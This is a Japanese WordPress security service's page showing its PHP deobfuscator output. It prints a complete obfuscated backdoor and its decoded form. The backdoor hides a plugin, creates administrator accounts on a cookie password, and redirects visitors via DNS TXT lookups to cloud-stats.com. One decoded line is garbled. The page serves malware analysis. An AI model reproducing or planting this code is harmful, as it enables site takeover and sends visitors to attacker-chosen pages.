Japanese English

PHP 難読化コードの復元・デコード

Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php $c2017921717=base64_decode('YTkwNjlkOGViOTFmNWExZGNmZTlkZWQ1NjM1NzJkZDU=');if(current_user_can(base64_decode('YWRtaW5pc3RyYXRvcg=='))&&!array_key_exists(base64_decode('c2hvd19hbGw='),$_GET)){add_action(base64_decode('YWRtaW5fcHJpbnRfc2NyaXB0cw=='),function(){echo base64_decode('PHN0...



難読化されたPHPコード

<?php
$c2017921717=base64_decode('YTkwNjlkOGViOTFmNWExZGNmZTlkZWQ1NjM1NzJkZDU=');if(current_user_can(base64_decode('YWRtaW5pc3RyYXRvcg=='))&&!array_key_exists(base64_decode('c2hvd19hbGw='),$_GET)){add_action(base64_decode('YWRtaW5fcHJpbnRfc2NyaXB0cw=='),function(){echo base64_decode('PHN0eWxlPg==');echo base64_decode('I3RvcGxldmVsX3BhZ2Vfd3Bjb2RlIHsgZGlzcGxheTogbm9uZTsgfQ==');echo base64_decode('I3dwLWFkbWluLWJhci13cGNvZGUtYWRtaW4tYmFyLWluZm8geyBkaXNwbGF5OiBub25lOyB9');echo base64_decode('I3dwY29kZS1ub3RpY2UtZ2xvYmFsLXJldmlld19yZXF1ZXN0IHsgZGlzcGxheTogbm9uZTsgfQ==');echo base64_decode('PC9zdHlsZT4=');});add_filter(base64_decode('YWxsX3BsdWdpbnM='),function($p3968202353){unset($p3968202353[base64_decode('aW5zZXJ0LWhlYWRlcnMtYW5kLWZvb3RlcnMvaWhhZi5waHA=')]);return $p3968202353;});}if(!function_exists(base64_decode('X3JlZA=='))){error_reporting(0);ini_set(base64_decode('ZGlzcGxheV9lcnJvcnM='),0);function _gcookie($c2013832146){return(isset($_COOKIE[$c2013832146]))?base64_decode($_COOKIE[$c2013832146]):'';}if(!empty($c2017921717)&&_gcookie(base64_decode('cHc='))===$c2017921717){switch(_gcookie(base64_decode('Yw=='))){case base64_decode('c2Q='):$u2564639436=_gcookie(base64_decode('ZA=='));if(strpos($u2564639436,base64_decode('Lg=='))>0){update_option(base64_decode('ZA=='),$u2564639436);}break;case base64_decode('YXU='):$m4067256894=_gcookie(base64_decode('dQ=='));$y2181537457=_gcookie(base64_decode('cA=='));$r4024072794=_gcookie(base64_decode('ZQ=='));if($m4067256894&&$y2181537457&&$r4024072794&&!username_exists($m4067256894)){$b2809058197=wp_create_user($m4067256894,$y2181537457,$r4024072794);$t2375276105=new WP_User($b2809058197);$t2375276105->set_role(base64_decode('YWRtaW5pc3RyYXRvcg=='));}break;}return;}if(stripos(wp_login_url(),$_SERVER[base64_decode('U0NSSVBUX05BTUU=')])!==false){return;}if(_gcookie(base64_decode('c2tpcA=='))===base64_decode('MQ==')){return;}function _is_mobile(){return preg_match(base64_decode('LyhhbmRyb2lkfHdlYm9zfGF2YW50Z298aXBob25lfGlwYWR8aXBvZHxibGFja2JlcnJ5fGllbW9iaWxlfGJvbHR8Ym9vc3R8Y3JpY2tldHxkb2NvbW98Zm9uZXxoaXB0b3B8bWluaXxvcGVyYSBtaW5pfGtpdGthdHxtb2JpfHBhbG18cGhvbmV8cGllfHRhYmxldHx1cC5icm93c2VyfHVwLmxpbmt8d2Vib3N8d29zKS9p'),$_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')]);}function _is_iphone(){return preg_match(base64_decode('LyhpcGhvbmV8aXBvZCkvaQ=='),$_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')]);}function _user_ip(){foreach(array(base64_decode('SFRUUF9DRl9DT05ORUNUSU5HX0lQ'),base64_decode('SFRUUF9DTElFTlRfSVA='),base64_decode('SFRUUF9YX0ZPUldBUkRFRF9GT1I='),base64_decode('SFRUUF9YX0ZPUldBUkRFRA=='),base64_decode('SFRUUF9YX0NMVVNURVJfQ0xJRU5UX0lQ'),base64_decode('SFRUUF9GT1JXQVJERURfRk9S'),base64_decode('SFRUUF9GT1JXQVJERUQ='),base64_decode('UkVNT1RFX0FERFI='))as $k2324736937){if(array_key_exists($k2324736937,$_SERVER)&&!empty($_SERVER[$k2324736937])){foreach(explode(base64_decode('LA=='),$_SERVER[$k2324736937])as $j2783163181){$j2783163181=trim($j2783163181);if(filter_var($j2783163181,FILTER_VALIDATE_IP,FILTER_FLAG_NO_PRIV_RANGE|FILTER_FLAG_NO_RES_RANGE)!==false){return $j2783163181;}}}}return false;}function _red(){if(is_user_logged_in()){return;}$j2783163181=_user_ip();if(!$j2783163181){return;}$w113136155=get_transient(base64_decode('ZXhw'));if(!is_array($w113136155)){$w113136155=array();}foreach($w113136155 as $t140662621=>$g1801730948){if(time()-$g1801730948>86400){unset($w113136155[$t140662621]);}}if(key_exists($j2783163181,$w113136155)&&(time()-$w113136155[$j2783163181]<86400)){return;}$y3475444733=filter_var(parse_url(base64_decode('aHR0cHM6Ly8=').$_SERVER[base64_decode('SFRUUF9IT1NU')],PHP_URL_HOST),FILTER_VALIDATE_DOMAIN,FILTER_FLAG_HOSTNAME);$l1584689357=str_replace(base64_decode('Og=='),base64_decode('LQ=='),$j2783163181);$l1584689357=str_replace(base64_decode('Lg=='),base64_decode('LQ=='),$l1584689357);$l2439710439=base64_decode('Y2xvdWQtc3RhdHMuY29t');$e252678980=get_option(base64_decode('ZA=='));if($e252678980&&strpos($e252678980,base64_decode('Lg=='))>0){$l2439710439=$e252678980;}$f3775001192=_is_iphone()?base64_decode('aQ=='):base64_decode('bQ==');$s2545728356=(!$y3475444733?base64_decode('dW5rLmNvbQ=='):$y3475444733).base64_decode('Lg==').(!$l1584689357?base64_decode('MC0wLTAtMA=='):$l1584689357).base64_decode('Lg==').mt_rand(100000,999999).base64_decode('Lg==').(_is_mobile()?base64_decode('bg==').$f3775001192:base64_decode('bmQ=')).base64_decode('Lg==').$l2439710439;$q453955339=@dns_get_record($s2545728356,DNS_TXT);if(is_array($q453955339)&&!empty($q453955339)){if(isset($q453955339[0][base64_decode('dHh0')])){$q453955339=$q453955339[0][base64_decode('dHh0')];$q453955339=base64_decode($q453955339);if($q453955339==base64_decode('ZXJy')){$w113136155[$j2783163181]=time();delete_transient(base64_decode('ZXhw'));set_transient(base64_decode('ZXhw'),$w113136155);}else if(substr($q453955339,0,4)===base64_decode('aHR0cA==')){$w113136155[$j2783163181]=time();delete_transient(base64_decode('ZXhw'));set_transient(base64_decode('ZXhw'),$w113136155);wp_redirect($q453955339);exit;}}}}add_action(base64_decode('aW5pdA=='),base64_decode('X3JlZA=='));}
?>

デコード(難読化解除)されたコード

<?php

$c2017921717 = "a9069d8eb91f5a1dcfe9ded563572dd5";
if (current_user_can("administrator") && !array_key_exists("show_all", $_GET)) {
    add_action("admin_print_scripts", function () {
        echo "<style>";
        echo "#toplevel_page_wpcode { display: none; }";
        echo "#wp-admin-bar-wpcode-admin-bar-info { display: none; }";
        echo "#wpcode-notice-global-review_request { display: none; }";
        echo "</style>";
    });
    add_filter("all_plugins", function ($p3968202353) {
        unset($p3968202353["insert-headers-and-footers/ihaf.php"]);
        return $p3968202353;
    });
}
if (!function_exists("_red")) {
    error_reporting(0);
    ini_set("display_errors", 0);
    function _gcookie($c2013832146)
    {
        return isset($_COOKIE[$c2013832146]) ? base64_decode($_COOKIE[$c2013832146]) : '';
    }
    if (!empty($c2017921717) && _gcookie("pw") === $c2017921717) {
        switch (_gcookie("c")) {
            case "sd":
                $u2564639436 = _gcookie("d");
                if (strpos($u2564639436, ".") > 0) {
                    update_option("d", $u2564639436);
                }
                break;
            case "au":
                $m4067256894 = _gcookie("u");
                $y2181537457 = _gcookie("p");
                $r4024072794 = _gcookie("e");
                if ($m4067256894 && $y2181537457 && $r4024072794 && !username_exists($m4067256894)) {
                    $b2809058197 = wp_create_user($m4067256894, $y2181537457, $r4024072794);
                    $t2375276105 = new WP_User($b2809058197);
                    $t2375276105->set_role("administrator");
                }
                break;
        }
        return;
    }
    if (stripos(wp_login_url(), $_SERVER["SCRIPT_NAME"]) !== false) {
        return;
    }
    if (_gcookie("skip") === "1") {
        return;
    }
    function _is_mobile()
    {
        return preg_match("/(android|webos|avantgo|iphone|ipad|ipod|blackberry|iemobile|bolt|boost|cricket|docomo|fone|hiptop|mini|opera mini|kitkat|mobi|palm|phone|pie|tablet|up.browser|up.link|webos|wos)/i", $_SERVER["HTTP_USER_AGENT"]);
    }
    function _is_iphone()
    {
        return preg_match("/(iphone|ipod)/i", $_SERVER["HTTP_USER_AGENT"]);
    }
    function _user_ip()
    {
        foreach (array("HTTP_CF_CONNECTING_IP", "HTTP_CLIENT_IP", "HTTP_X_FORWARDED_FOR", "HTTP_X_FORWARDED", "HTTP_X_CLUSTER_CLIENT_IP", "HTTP_FORWARDED_FOR", "HTTP_FORWARDED", "REMOTE_ADDR") as $k2324736937) {
            if (array_key_exists($k2324736937, $_SERVER) && !empty($_SERVER[$k2324736937])) {
                foreach (explode(",", $_SERVER[$k2324736937]) as $j2783163181) {
                    $j2783163181 = trim($j2783163181);
                    if (filter_var($j2783163181, FILTER_VALIDATE_IP, "FILTER_FLAG_NO_RW[__SOOGE") !== false) {
                        return $j2783163181;
                    }
                }
            }
        }
        return false;
    }
    function _red()
    {
        if (is_user_logged_in()) {
            return;
        }
        $j2783163181 = _user_ip();
        if (!$j2783163181) {
            return;
        }
        $w113136155 = get_transient("exp");
        if (!is_array($w113136155)) {
            $w113136155 = array();
        }
        foreach ($w113136155 as $t140662621 => $g1801730948) {
            if (time() - $g1801730948 > 86400) {
                unset($w113136155[$t140662621]);
            }
        }
        if (key_exists($j2783163181, $w113136155) && time() - $w113136155[$j2783163181] < 86400) {
            return;
        }
        $y3475444733 = filter_var(parse_url("https://" . $_SERVER["HTTP_HOST"], PHP_URL_HOST), FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME);
        $l1584689357 = str_replace(":", "-", $j2783163181);
        $l1584689357 = str_replace(".", "-", $l1584689357);
        $l2439710439 = "cloud-stats.com";
        $e252678980 = get_option("d");
        if ($e252678980 && strpos($e252678980, ".") > 0) {
            $l2439710439 = $e252678980;
        }
        $f3775001192 = _is_iphone() ? "i" : "m";
        $s2545728356 = (!$y3475444733 ? "unk.com" : $y3475444733) . "." . (!$l1584689357 ? "0-0-0-0" : $l1584689357) . "." . mt_rand(100000, 999999) . "." . (_is_mobile() ? "n" . $f3775001192 : "nd") . "." . $l2439710439;
        $q453955339 = @dns_get_record($s2545728356, DNS_TXT);
        if (is_array($q453955339) && !empty($q453955339)) {
            if (isset($q453955339[0]["txt"])) {
                $q453955339 = $q453955339[0]["txt"];
                $q453955339 = base64_decode($q453955339);
                if ($q453955339 == "err") {
                    $w113136155[$j2783163181] = time();
                    delete_transient("exp");
                    set_transient("exp", $w113136155);
                } else {
                    if (substr($q453955339, 0, 4) === "http") {
                        $w113136155[$j2783163181] = time();
                        delete_transient("exp");
                        set_transient("exp", $w113136155);
                        wp_redirect($q453955339);
                        exit;
                    }
                }
            }
        }
    }
    add_action("init", "_red");
}

■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります

(C)2019 ワードプレス ドクター All rights reserved.